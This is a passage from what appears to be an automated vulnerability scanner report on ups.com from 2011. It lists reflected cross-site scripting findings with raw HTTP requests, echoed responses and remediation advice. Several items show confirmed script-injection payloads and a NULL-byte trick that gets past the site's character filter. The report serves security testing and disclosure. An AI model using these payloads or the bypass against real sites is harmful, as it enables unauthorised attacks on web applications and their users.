<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa93460" a=b 31fb5663470/orderSupplies?appid=WBSO">
...[SNIP]...

1.160. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ba640%0a7ba9ebff89 was submitted in the REST URL parameter 1. This input was echoed as ba640
7ba9ebff89
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osaba640%0a7ba9ebff89/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osaba640
7ba9ebff89
/orderSupplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.c
...[SNIP]...

1.161. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 757e7%0a4c6ea7d00f3 was submitted in the REST URL parameter 2. This input was echoed as 757e7
4c6ea7d00f3
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osa/orderSupplies757e7%0a4c6ea7d00f3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41096


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
heForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies757e7
4c6ea7d00f3
?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSu
...[SNIP]...

1.162. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75362"%20a%3db%205c4e0ed9a9d was submitted in the REST URL parameter 2. This input was echoed as 75362" a=b 5c4e0ed9a9d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies75362"%20a%3db%205c4e0ed9a9d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa/orderSupplies75362" a=b 5c4e0ed9a9d?appid=WBSO">
...[SNIP]...

1.163. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4d1'%3b2aeeb4d514c was submitted in the REST URL parameter 2. This input was echoed as 7b4d1';2aeeb4d514c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osa/orderSupplies7b4d1'%3b2aeeb4d514c HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.164. https://www.ups.com/osa/orderSupplies [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001b456</script><script>alert(1)</script>dcaf37ce584 was submitted in the loc parameter. This input was echoed as 1b456</script><script>alert(1)</script>dcaf37ce584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%001b456</script><script>alert(1)</script>dcaf37ce584&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9761


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1b456</script><script>alert(1)</script>dcaf37ce584&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b45
...[SNIP]...

1.165. https://www.ups.com/osa/orderSupplies [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002cecd'-alert(1)-'557a7bd6f89 was submitted in the loc parameter. This input was echoed as 2cecd'-alert(1)-'557a7bd6f89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%002cecd'-alert(1)-'557a7bd6f89&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9085


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
6f89&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.166. https://www.ups.com/osa/orderSupplies [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ca0f2"><script>alert(1)</script>02364017778 was submitted in the loc parameter. This input was echoed as ca0f2"><script>alert(1)</script>02364017778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%00ca0f2"><script>alert(1)</script>02364017778&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9661


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_ca0f2"><script>alert(1)</script>02364017778&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_ca0f2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B02364017778%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.167. https://www.ups.com/quantum_services/download [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0028dc6</script><script>alert(1)</script>564d2e80867 was submitted in the loc parameter. This input was echoed as 28dc6</script><script>alert(1)</script>564d2e80867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%0028dc6</script><script>alert(1)</script>564d2e80867&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15351


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc6</script><script>alert(1)</script>564d2e80867&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc
...[SNIP]...

1.168. https://www.ups.com/quantum_services/download [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0065b40"><script>alert(1)</script>7de82a96742 was submitted in the loc parameter. This input was echoed as 65b40"><script>alert(1)</script>7de82a96742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%0065b40"><script>alert(1)</script>7de82a96742&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15230


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_65b40"><script>alert(1)</script>7de82a96742&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_65b40%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B7de82a96742%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.169. https://www.ups.com/quantum_services/download [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00933e4'-alert(1)-'a0dc40a090a was submitted in the loc parameter. This input was echoed as 933e4'-alert(1)-'a0dc40a090a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%00933e4'-alert(1)-'a0dc40a090a&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14525


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
090a&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
actionUrl = "/one-to-
...[SNIP]...

1.170. https://www.ups.com/qvadmin/admin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 524bb"%20a%3db%2057ee68500f4 was submitted in the REST URL parameter 1. This input was echoed as 524bb" a=b 57ee68500f4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin524bb"%20a%3db%2057ee68500f4/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin524bb" a=b 57ee68500f4/admin?appid=CVA">
...[SNIP]...

1.171. https://www.ups.com/qvadmin/admin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8608%0a756b3f1e78a was submitted in the REST URL parameter 1. This input was echoed as f8608
756b3f1e78a
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadminf8608%0a756b3f1e78a/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadminf8608
756b3f1e78a
/admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmi
...[SNIP]...

1.172. https://www.ups.com/qvadmin/admin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8127'%3b5afbf672e81 was submitted in the REST URL parameter 1. This input was echoed as a8127';5afbf672e81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmina8127'%3b5afbf672e81/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
actionUrl = "/one-to-
...[SNIP]...

1.173. https://www.ups.com/qvadmin/admin [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 5ce57%0ac1d85533e83 was submitted in the REST URL parameter 2. This input was echoed as 5ce57
c1d85533e83
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

